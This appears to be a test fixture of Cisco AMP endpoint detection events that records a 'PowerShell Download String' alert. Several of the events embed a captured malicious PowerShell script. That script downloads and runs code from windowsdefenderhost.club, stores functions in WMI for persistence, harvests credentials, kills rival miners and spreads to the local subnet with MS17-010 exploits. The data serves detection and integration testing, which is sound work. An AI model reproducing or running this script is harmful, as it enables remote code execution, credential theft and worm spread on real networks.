 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download 
String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
